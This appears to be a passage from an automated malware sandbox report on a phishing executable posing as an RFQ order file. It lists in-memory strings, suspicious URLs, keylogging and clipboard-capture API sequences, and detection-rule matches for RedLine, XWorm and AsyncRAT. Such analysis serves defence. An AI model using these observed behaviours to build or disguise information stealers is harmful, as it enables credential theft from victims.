Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: alg.exe, 00000003.00000003.1327233755.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1327335153.00000000004DA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1330185841.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1326089559.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/vi?usid=25&utid=9811636311
Source: alg.exe, 00000003.00000003.1327233755.00000000004CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/vi?usid=25&utid=9811636311LocationETagAuthentication-InfoAgeAccept-RangesLas
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.1433852870.00000219F93E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1850743091.0000020C70AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1847404696.0000020C70770000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: alg.exe, 00000003.00000003.1489388095.00000000014E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000010.00000002.1365957011.0000021980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1272520755.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1272520755.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000000.1258507285.00000000006B2000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: alg.exe, 00000003.00000003.1536468883.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000003.00000003.1537846730.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1538061598.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1569294071.00000268701C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000003.00000003.1313784977.00000000014E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: build.exe, 00000006.00000002.1776990711.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

System Summary

Source: 5.2.RegSvcs.exe.3d96bf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d007a0.4.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 6.0.build.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d007a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.3d4b9d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d0ea18.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d18074.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d053d4.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d18074.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.2d053d4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.0.XClient.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.RegSvcs.exe.3d96bf0.6.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 5.2.RegSvcs.exe.3d4b9d0.5.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000000.1260246043.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: This is a third-party compiled AutoIt script.		0_2_00403B3A
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_9e4699e2-5
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`		memstr_20e98757-3
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_3812767e-1
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`		memstr_6b2b8da6-3
Source: exhilaratingly.exe, 00000004.00000000.1231562986.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_a22fbef0-4
Source: exhilaratingly.exe, 00000004.00000000.1231562986.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`		memstr_1e8ad1da-d
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_10b85716-2
Source: exhilaratingly.exe, 00000014.00000002.1393593446.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`		memstr_61f107b2-f

Source: initial sample

Static PE information: Filename: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\d225894719a6adcd.bin

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0040E6A0		0_2_0040E6A0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042D975		0_2_0042D975
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0040FCE0		0_2_0040FCE0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004221C5		0_2_004221C5
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004362D2		0_2_004362D2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004803DA		0_2_004803DA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0043242E		0_2_0043242E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004225FA		0_2_004225FA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0045E616		0_2_0045E616
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004166E1		0_2_004166E1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0043878F		0_2_0043878F
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00436844		0_2_00436844
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00480857		0_2_00480857
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00418808		0_2_00418808
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00468889		0_2_00468889
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042CB21		0_2_0042CB21
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00532CC8		0_2_00532CC8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00436DB6		0_2_00436DB6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00416F9E		0_2_00416F9E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00413030		0_2_00413030
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042F1D9		0_2_0042F1D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00423187		0_2_00423187
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00401287		0_2_00401287
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00421484		0_2_00421484
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00415520		0_2_00415520
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00427696		0_2_00427696
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00415760		0_2_00415760
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00421978		0_2_00421978
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00439AB5		0_2_00439AB5
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00487DDB		0_2_00487DDB
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00421D90		0_2_00421D90
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0042BDA6		0_2_0042BDA6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0040DF00		0_2_0040DF00
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00413FE0		0_2_00413FE0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB9F88		0_2_00BB9F88
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FC00D9		0_2_02FC00D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F851EE		0_2_02F851EE
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F86EAF		0_2_02F86EAF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FBC7F0		0_2_02FBC7F0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FB3780		0_2_02FB3780
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FBD580		0_2_02FBD580
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F87B71		0_2_02F87B71
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FC39A3		0_2_02FC39A3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FB5980		0_2_02FB5980
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F87F80		0_2_02F87F80
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_00A4DC98		4_2_00A4DC98
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012C515C		4_2_012C515C
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012C39A3		4_2_012C39A3
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_012B5980		4_2_012B5980
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe	Code function: 4_2_01286EAF		4_2_01286EAF
